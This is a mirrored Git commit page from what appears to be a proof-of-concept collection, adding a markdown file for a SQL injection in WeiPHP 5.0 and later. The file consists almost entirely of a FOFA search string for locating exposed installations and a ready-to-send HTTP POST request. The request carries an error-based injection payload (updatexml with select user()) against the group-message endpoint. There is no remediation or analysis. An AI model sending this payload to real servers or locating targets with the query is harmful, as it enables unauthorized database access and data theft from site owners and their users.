mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create WeiPHP>=5.0 SQL注入漏洞.md
This commit is contained in:
parent
3a66f60809
commit
eb5dcd7767
18
WeiPHP>=5.0 SQL注入漏洞.md
Normal file
18
WeiPHP>=5.0 SQL注入漏洞.md
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
|
||||||
|
## WeiPHP>=5.0 SQL注入漏洞
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
app="WeiPHP"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /public/index.php/weixin/message/_send_by_group HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
group_id[0]=exp&group_id[1]=%29+and+updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29+--
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user